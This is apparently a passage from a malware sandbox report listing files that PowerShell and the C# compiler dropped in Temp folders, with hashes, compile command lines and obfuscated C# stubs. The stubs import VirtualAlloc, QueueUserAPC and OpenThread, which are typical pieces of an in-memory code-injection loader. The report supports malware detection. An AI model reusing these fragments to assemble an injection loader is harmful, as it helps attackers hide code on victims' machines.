                          SHA-512:27C4E9D4D1926A87EB5A2CAFD768D80A9D566C5FE9C7EB17F87453698415B30E251816738388C3171519A74B20AB0919C47C04A1E6CF9E1D82547540DF5E1682
                          Malicious:false
                          Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class ufc. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint ylpxxdj,uint gtjjej);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr mmpi,uint xkljddbswyg,uint jfalf,uint iqbvunafhnr);.. }..}.
                          C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.cmdline
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                          Category:dropped
                          Size (bytes):371
                          Entropy (8bit):5.151296249516787
                          Encrypted:false
                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fGYJ/fJrGzxs7+AEszI923fGYJ/fJrb:p37Lvkmb6KzuYJ/fJrGWZE2uYJ/fJrb
                          MD5:C5EAA36B02E3E42DCAC19315987BD2BF
                          SHA1:9E911AD12F0713B3E5C501D19BB86C77472FD22D
                          SHA-256:AA30E86130161DA18E4EB94BB2F46B956D4A23C1359588276525791FED359947
                          SHA-512:1763E1B034A500C4556525E5CCFE1839BC4F342441CC0AD54EEC4F917C0B3ADA905168E8BBFA1447050F154A37F0FBD27945075CB5ADDBEC4A71F41D3C142D5E
                          Malicious:false
                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.0.cs"
                          C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.dll
                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):3584
                          Entropy (8bit):2.5996985608858223
                          Encrypted:false
                          SSDEEP:24:etGS0/W2dg85xyFODuhxkXdWXoWtkZfOnXF+WI+ycuZhNYHakSpQPNnq:6lkb5xykIktWEJOn1l1ulGa3Cq
                          MD5:49B131E65B23D979BA7ED017BA9C7F61
                          SHA1:E4F38CA7AD5EE7CDD3755D0AF594DCE2EBB29035
                          SHA-256:EDAB1CDD86EBBB84944E94F478BFADF9B7704336C65BE2CF7EF74A2691261512
                          SHA-512:45C0B537C27F0694CD6C31481830D1BB220475DD1638B2A19E4635B90D27CD4BCDF3FD44E5165317C78819FB2700969F759254148F7D13E96999F8F2E577FB7D
                          Malicious:false
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................#... ...@....... ....................................@..................................#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..X.............................................................(....*BSJB............v4.0.30319......l...H...#~......8...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...................................................... 6............ H............ P.....P ......].........c.....k.....r.....w...............]. ...]...!.].%...].......*.....3.......6.......H.......P...........
                          C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.out
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                          Category:dropped
                          Size (bytes):868
                          Entropy (8bit):5.289875059357362
                          Encrypted:false
                          SSDEEP:12:xKIR37Lvkmb6KzuYJ/fJrGWZE2uYJ/fJraKaMK4BFNn5KBZvK2wo8dRSgarZucvs:AId3ka6KzZE2gKaM5DqBVKVrdFAMBJTH
                          MD5:5520D1A07EE800264B0E26905CDD21F1
                          SHA1:AB2EBB2894E8B4D6800436C7D1678737430BB273
                          SHA-256:5658F5CB41F431B1472EEF88932E02DEF879A12362D986DFD847F6E7EEA41DA8
                          SHA-512:7C9DB98B82C608CC22A132923F42F1358B08776A033B012C06BFF2B747C28CB72B1C05C13DFA12DFC4E66A1A2F14F614F74329B0BE67CD2086A92D1B1B4A04F2
                          Malicious:false
                          Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                          C:\Users\user\AppData\Local\Temp\nigogz4l\CSCB0FB5A4205944E4B1A4F1A7502114E8.TMP
                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          File Type:MSVC .res
                          Category:dropped
                          Size (bytes):652
                          Entropy (8bit):3.0739498574927255
                          Encrypted:false
                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grywak7Ynqq2PN5Dlq5J:+RI+ycuZhN+akS2PNnqX
                          MD5:2C961A918364FF38854F8EC54AF4945F
                          SHA1:B0B1AF0532EAC84BAF2E604E3FF19E39D365B473
                          SHA-256:501BAEF967AAD4AB2AA2F5BFC768E871A8E98381C5AA409ADBCA5E31538DF8F1
                          SHA-512:11EB0EDBDBB19470C827A85E25BDD9989476E58B9E6074C91DD38CCEDD5935B7F23D842A1CFE1E852E6044E385DFDEC0C6B65800FFE5F07813171650BA8F48D7
                          Malicious:false
                          Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...n.i.g.o.g.z.4.l...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...n.i.g.o.g.z.4.l...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                          C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.0.cs
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text
                          Category:dropped
                          Size (bytes):414
                          Entropy (8bit):5.049516587690195
                          Encrypted:false
                          SSDEEP:6:V/DsYLDS81zuJwMRSR7a1f892RV9SRa+rVSSRnA/fsTfaskNDVzy:V/DTLDfuEB92Ru9rV5nA/ETf5EDVzy
                          MD5:66D77EA7A947B910D56CFB0FC4B85BE6
                          SHA1:9D503A2C0DDAEE23A81802CA8444D8B7039ECE6B
                          SHA-256:66E86036222F5D3B474370BBBA04C4A7DECC42D05D25675846CBA63F16877D8B
                          SHA-512:A53181798E577ABD31EE4063903E62171903B369B4FF26C337CC0108BE8883BEE39000A858FB24E92D13CDB89EF5782AADF06B7BD6807DD2D46458F813EE772B
                          Malicious:false
                          Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class yarnha. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr nafifqdmhmh,IntPtr uyeb,IntPtr hpistj);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint ykuvjce,uint ibkrrfwtfdq,IntPtr ljhqnvahhfq);.. }..}.
                          C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                          Category:dropped
                          Size (bytes):371
                          Entropy (8bit):5.199068343906432
                          Encrypted:false
                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fjoQ0zxs7+AEszI923fjoG:p37Lvkmb6KzLorWZE2LoG
                          MD5:30EEDF26D86038CE52442382C4102198
                          SHA1:CF34BD8F77949FE161B5776819A519BE39E881D4
                          SHA-256:4FB991BB47038A3CE9017D5F7A9C5AF7437683FB51BD2FD9CE697EF26221ABB7
                          SHA-512:2BC5537B7D3744A654F9E7D7F13A1C1FCA8FD587700BA36940EE021FC814C82C1ED2E07A9296CFF6754E04C199A3830B11B01A8666565CF657157B0CA7BFECC2
                          Malicious:true
                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.0.cs"
                          C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.dll
                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):3584
                          Entropy (8bit):2.634144238857034
                          Encrypted:false
                          SSDEEP:24:etGSM8+mUE7R85z7woel/gNE4/eiDPtkZfjgOTrYu3DZ0WI+ycuZhN+akS2PNnq:62XE7S5gG8iyJjg49ZX1ul+a3Kq
                          MD5:833C125BC415845EE1B8A822DC088C02
                          SHA1:D6A1176ACF053B03DA6D519EAB4EB7017B48A0E8
                          SHA-256:996E609A3921946330E840406C64CD8F7AB162B88504BCE05DCA581E264CD7E3
                          SHA-512:000291790C6E39E5F6D5AA5D4F3C5B2C27C411089C4AA55F7FB26E44B7C00E079F7E9B16F5ECFE20253256C51FF572414ECAA138F75C19A0657B2562733D01B4
                          Malicious:false
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..d.............................................................(....*BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...............(...................................... 9............ F............ Y.....P ......d.........j.....v.....{.....................d. ...d...!.d.%...d.......*.....3.;.....9.......F.......Y...........
                          C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.out
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                          Category:modified
                          Size (bytes):868
                          Entropy (8bit):5.305483822092941
                          Encrypted:false
                          SSDEEP:24:AId3ka6KzLRE2LIKaM5DqBVKVrdFAMBJTH:Akka6aLRE2LIKxDcVKdBJj
                          MD5:F92374784F54FAECD630C33FDA8432E7
                          SHA1:D7EE4FE021D3E360ABE78C8F6D8F0669ADBB8226
                          SHA-256:6D480811F8E381CACFDB17A10A0FDA08081AF31457C33DD74AE5E466667863C9
                          SHA-512:48ABFF4108A6A3B8D2E38632EF7120BB65D6C0BB124D414B3FFF6B6DF64B914BFD926E3F759B4F05C5CF1598CE47D004E24D77C3A5DD504C74D563D917B61394
                          Malicious:false
                          Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                          C:\Users\user\AppData\Local\Temp\nlbomp32\CSCD36E4F5AB95F41AC9563905B5139F56.TMP
                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          File Type:MSVC .res
                          Category:dropped
                          Size (bytes):652
                          Entropy (8bit):3.0937098411846407
                          Encrypted:false
                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryglcak7Ynqq7lxPN5Dlq5J:+RI+ycuZhNqlcakS7lxPNnqX
                          MD5:7BB8DBEA1D7CC9AE6DD3C9DDACDD5B05
                          SHA1:70F372DC7BEC4258A118B2994CF727706C637A6F
                          SHA-256:7E32817C8D9513A2384D66358662E876E51F86C98ED88DCEF8600E517D18EE4B
                          SHA-512:854DF89436FA8D435CFFA8AD3849731BDF6C1DC51ABCB702C67966E54952001EF34C86E6C44F4FB255A4B709C3E71DE9BBC99C82BDE9E997E39810C8F1B55B75
                          Malicious:false
                          Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...n.l.b.o.m.p.3.2...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...n.l.b.o.m.p.3.2...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                          C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.0.cs
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text
                          Category:dropped
                          Size (bytes):414
                          Entropy (8bit):5.049516587690195
                          Encrypted:false
                          SSDEEP:6:V/DsYLDS81zuJwMRSR7a1f892RV9SRa+rVSSRnA/fsTfaskNDVzy:V/DTLDfuEB92Ru9rV5nA/ETf5EDVzy
                          MD5:66D77EA7A947B910D56CFB0FC4B85BE6
                          SHA1:9D503A2C0DDAEE23A81802CA8444D8B7039ECE6B
                          SHA-256:66E86036222F5D3B474370BBBA04C4A7DECC42D05D25675846CBA63F16877D8B
                          SHA-512:A53181798E577ABD31EE4063903E62171903B369B4FF26C337CC0108BE8883BEE39000A858FB24E92D13CDB89EF5782AADF06B7BD6807DD2D46458F813EE772B
                          Malicious:false
                          Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class yarnha. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr nafifqdmhmh,IntPtr uyeb,IntPtr hpistj);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint ykuvjce,uint ibkrrfwtfdq,IntPtr ljhqnvahhfq);.. }..}.
                          C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.cmdline
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                          Category:dropped
                          Size (bytes):371
                          Entropy (8bit):5.193724877080382
                          Encrypted:false
                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fkosQoOUzxs7+AEszI923fkosQoM:p37Lvkmb6KzPxUWZE2PL
                          MD5:B5A546325FF70B405A6EDD0E5B93A5B0
                          SHA1:1E9346960956AE815C2BDA5EC359E6D535A870FE
                          SHA-256:D00CA81D76135390A9D1558CDE7562A4BE918C9DE9777A71881B6454A3ECE403
                          SHA-512:11A099697D3417B2E47DABAA93C85D5EE6B3096F48B44B1EE1B37A822EC78DC8B04AD599CFA641FAECB6FC951C9E0F5916A938BA84A09F026EEF36F00494BE6D
                          Malicious:false
                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.0.cs"
                          C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.dll
                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):3584
                          Entropy (8bit):2.6346506026861856
                          Encrypted:false
                          SSDEEP:24:etGSR8+mUE7R85z7woel/gXxp4/eiDPtkZf/mB5DZ0WI+ycuZhNqlcakS7lxPNnq:6nXE7S5gGBbiyJ/mBxZX1ulqaa37Bq
                          MD5:32F1B9D17FF5CE273F76E691A3957DA8
                          SHA1:3233B9F58DAA9DF48B43342EE29CC6AD6B8D4178
                          SHA-256:81BBAACB864F40359F08B4E22970E88F040D833B132CF5E48765A22CEE909384
                          SHA-512:D1B55F658650A21F57676944AE121C986A3FB3E6092FFACC61B59EDD5AFC7F695F6292C8AB281AF716B88DDAB7BCCAF2DC03D1BE27CEE8C992ABCC5904D87640
                          Malicious:false
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..d.............................................................(....*BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...............(...................................... 9............ F............ Y.....P ......d.........j.....v.....{.....................d. ...d...!.d.%...d.......*.....3.;.....9.......F.......Y...........
                          C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.out
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                          Category:modified
                          Size (bytes):868
                          Entropy (8bit):5.308132284793118
                          Encrypted:false
                          SSDEEP:24:AId3ka6KzPx1E2PKKaM5DqBVKVrdFAMBJTH:Akka6aPx1E2PKKxDcVKdBJj
                          MD5:7E8A8641A737C70C899C4179EDDFC967
                          SHA1:3D6B8AB11FC9BF77D4395D19B1F8555B94768BB2
                          SHA-256:542B3D61A71514E012405F6DA07489BEEAEC5F0454D4CB25967E2BABCC896873
                          SHA-512:681789A5B72DA601257B45D36839BC0D1F422AE4B440D2A467ECD19552A2A8E00D8D686EE3B835508026643F184F955F221A4EBFC86DD02BDC111C966CEEC55A
                          Malicious:false
                          Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                          C:\Users\user\AppData\Local\Temp\ro0kv1nw\ro0kv1nw.0.cs
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text
                          Category:dropped
                          Size (bytes):395
                          Entropy (8bit):5.011724479977666
                          Encrypted:false
                          SSDEEP:6:V/DsYLDS81zuJZFMRSRa+eNMjSSRrh+SRNdDQaAntHQy:V/DTLDfuHV9eg5rh14aAntwy
                          MD5:B1DA1EF961AA0CE50C236459261D955A
                          SHA1:99CF19F188248557193608FE42C1CB88FCF234E1
                          SHA-256:139659D9C1D794242DE8DEFB1E33C785B3B63A691230874656B2B1AFC9E0B26B
                          SHA-512:27C4E9D4D1926A87EB5A2CAFD768D80A9D566C5FE9C7EB17F87453698415B30E251816738388C3171519A74B20AB0919C47C04A1E6CF9E1D82547540DF5E1682
                          Malicious:false
                          Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class ufc. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint ylpxxdj,uint gtjjej);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr mmpi,uint xkljddbswyg,uint jfalf,uint iqbvunafhnr);.. }..}.
                          C:\Users\user\AppData\Local\Temp\ro0kv1nw\ro0kv1nw.cmdline
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                          Category:dropped
                          Size (bytes):371
                          Entropy (8bit):5.2527558218035555
                          Encrypted:false
                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923f6LKafLXzxs7+AEszI923f6LKafLSn:p37Lvkmb6KzSOafrWZE2SOafGn
                          MD5:0E1A4FB543233681B29500DF56AA6F57
                          SHA1:8184927FBC93A8FCE2FD8CDCEC13AC2F88FB8306
                          SHA-256:EADB21BF3DAE2990213DE43C3E98CBAA88F21623B1B6A918BEE662FEEFB42507
                          SHA-512:8B62C9B1DE30ABD20A4C74F4D9697A9E681275136986C384D12084DE41FB94DC7FB8C843E9AF851B0576CF89C26D7A127FC9B966BCDC953F89C0F9F956BAAAFC
                          Malicious:false
                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ro0kv1nw\ro0kv1nw.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ro0kv1nw\ro0kv1nw.0.cs"
                          C:\Users\user\AppData\Local\Temp\ro0kv1nw\ro0kv1nw.out
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                          Category:dropped
                          Size (bytes):868
                          Entropy (8bit):5.3183379397344765
                          Encrypted:false
                          SSDEEP:24:AId3ka6KzSOafIE2SOafGuKaM5DqBVKVrdFAMBJTH:Akka6aSOeIE2SOeHKxDcVKdBJj
                          MD5:7241074EE55D01DA6C48E3A1DED01E88
                          SHA1:8221789569283A548A8860B38CE838E40150866B
                          SHA-256:FAF7AEF162FB9D7E43C8A189411C11D62BB1990731351E8520ED648937EE5A97
                          SHA-512:B7EF07709729A576FE4718BCA73B0CB499EBB5FEDF2323101207C6D4C5A9A41F64137EF3FA75F502B59CF391C85D65F5E70EB1AE0A46E787C83DC4A0268271BC
                          Malicious:false
                          Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ro0kv1nw\ro0kv1nw.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ro0kv1nw\ro0kv1nw.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                          C:\Users\user\AppData\Local\Temp\uu5u2nmv\CSC63445C49B154491498BDD3FB79A78AC.TMP
                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          File Type:MSVC .res
                          Category:dropped
                          Size (bytes):652
                          Entropy (8bit):3.109921450738045
                          Encrypted:false
                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grydThak7YnqqsTGPN5Dlq5J:+RI+ycuZhNtakS7PNnqX
                          MD5:1DF567DCC97B0A7A089824364B677531
                          SHA1:F78BFB839164EEA3C6373359223DF1E347ABAAF3
                          SHA-256:E9775CAE51FE4CF3AE6BD9573077DBCB268034D0940A69E9E8020305F210E05E
                          SHA-512:EA75DC230C2B40003F3FB9ECBB6252FF72AFAC23751E0FA6C72C006A435CECCC93D70F245302BD2402B161D11FDE48F521138FDC6348DD7F8ECC8CEFAB23BC05
                          Malicious:false
                          Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.u.5.u.2.n.m.v...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...u.u.5.u.2.n.m.v...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                          C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.0.cs
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text
                          Category:dropped
                          Size (bytes):414
                          Entropy (8bit):5.049516587690195
                          Encrypted:false
                          SSDEEP:6:V/DsYLDS81zuJwMRSR7a1f892RV9SRa+rVSSRnA/fsTfaskNDVzy:V/DTLDfuEB92Ru9rV5nA/ETf5EDVzy
                          MD5:66D77EA7A947B910D56CFB0FC4B85BE6
                          SHA1:9D503A2C0DDAEE23A81802CA8444D8B7039ECE6B
                          SHA-256:66E86036222F5D3B474370BBBA04C4A7DECC42D05D25675846CBA63F16877D8B
                          SHA-512:A53181798E577ABD31EE4063903E62171903B369B4FF26C337CC0108BE8883BEE39000A858FB24E92D13CDB89EF5782AADF06B7BD6807DD2D46458F813EE772B
                          Malicious:false
                          Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class yarnha. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr nafifqdmhmh,IntPtr uyeb,IntPtr hpistj);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint ykuvjce,uint ibkrrfwtfdq,IntPtr ljhqnvahhfq);.. }..}.
                          C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.cmdline
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                          Category:dropped
                          Size (bytes):371
                          Entropy (8bit):5.222902776745778
                          Encrypted:false
                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fhQHgUzxs7+AEszI923fhQHs9:p37Lvkmb6Kz5QHDWZE25QHs9
                          MD5:06D22660044726226847AB9E405CDCA3
                          SHA1:0FB2A0C3CFCD8C7F2B1DDBB956ABDABBFA1CB06D
                          SHA-256:EE83EE6D67E2174D63373BE421E6411D81997D2C20B757074BED1C71EC273790
                          SHA-512:5A6F2E94B557B234CC1E12BF643048A3A797453ECF8885F6D44B8CD4B2415330C9C4A95E0CFEF4BEB30E5165CE630D4F0805195BD16BAE7FE6FA84374814475F
                          Malicious:false
